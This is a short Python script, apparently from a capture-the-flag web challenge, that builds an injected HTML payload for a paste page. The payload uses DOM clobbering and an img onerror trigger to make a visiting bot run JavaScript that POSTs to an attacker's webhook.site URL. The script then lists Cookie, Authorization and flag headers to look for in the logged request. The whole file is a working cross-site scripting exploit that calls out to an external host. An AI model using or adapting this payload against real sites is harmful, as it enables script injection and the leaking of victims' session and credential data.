#!/usr/bin/env python3
"""
Capture ALL HTTP request headers sent by the bot
Create a paste that makes the bot send a request to webhook with ALL its headers
"""

import urllib.parse
WEBHOOK = "https://webhook.site/YOUR-WEBHOOK-ID"  # Replace with your webhook

# JavaScript to send a fetch request and capture what headers the BROWSER sends
# (Note: we can't see request headers directly, but we can make a request and have the webhook log them)
code = f"""
fetch('{WEBHOOK}', {{
    method: 'POST',
    body: 'Bot visited this page. Check request headers on webhook for potential FLAG.'
}});
""".replace('\n', ' ')

encoded = urllib.parse.quote(code)

payload = f'''<form id="errorReporter"><input name="path" value="data:text/javascript,{encoded}"></form>
<img id="renderConfig" src=x onerror="window.lastRenderError='x';throw new Error()">'''

print("PAYLOAD TO CHECK BOT HEADERS:")
print("=" * 80)
print(payload)
print("=" * 80)
print("\nThe webhook will log ALL HTTP headers sent by the bot.")
print("Check for:")
print("  - X-Flag")
print("  - Authorization")
print("  - Cookie")
print("  - User-Agent (might contain flag)")
print("  - Custom headers")